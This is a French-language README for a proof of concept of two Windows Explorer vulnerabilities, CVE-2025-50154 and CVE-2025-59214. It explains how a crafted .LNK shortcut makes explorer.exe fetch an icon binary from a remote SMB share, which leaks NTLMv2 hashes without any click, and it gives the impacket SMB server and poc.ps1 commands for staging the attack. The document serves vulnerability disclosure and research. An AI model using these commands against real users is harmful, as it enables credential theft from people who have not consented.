
PoC pour CVE-2025-50154 et CVE-2025-59214, vulnérabilités zero day dans l'explorateur de fichiers Windows divulguant NTLMv2-SSP sans interaction de l'utilisateur. Il s'agit d'un contournement du correctif de sécurité CVE-2025-24054
Par Ruben Enkaoua et Cymulate
Premier blog : Zero Click, One NTLM : Contournement du correctif de sécurité Microsoft (CVE-2025-50154)
Deuxième blog : Corrigé deux fois, toujours contourné : Nouvelle fuite NTLM (Contournement du correctif CVE-2025-50154)
La vulnérabilité d'origine, récemment corrigée, était une divulgation de hachage NTLM sans clic (0-click) déclenchée lorsque explorer.exe rendait l'icône d'un fichier raccourci .LNK dont l'icône était hébergée sur un serveur SMB distant.
Après le correctif, explorer.exe ne charge plus les icônes provenant de chemins SMB distants, empêchant ainsi la divulgation automatique des hachages NTLM.
Mise à jour : Le correctif pour CVE-2025-50154 n'a pas du tout fonctionné. Nous l'avons signalé, et un nouveau CVE a été attribué à la vulnérabilité : CVE-2025-59214. La preuve de concept (POC) est valable pour les deux CVE.
En créant un fichier .LNK avec :
Le processus explorer.exe va tout de même récupérer le fichier distant pour extraire l'icône PE de ses ressources RT_GROUP_ICON et RT_ICON.

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Remplacez les valeurs par le chemin, l'IP du serveur responder et le nom du fichier sur le serveur. Note : cela peut prendre 20 à 30 secondes.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"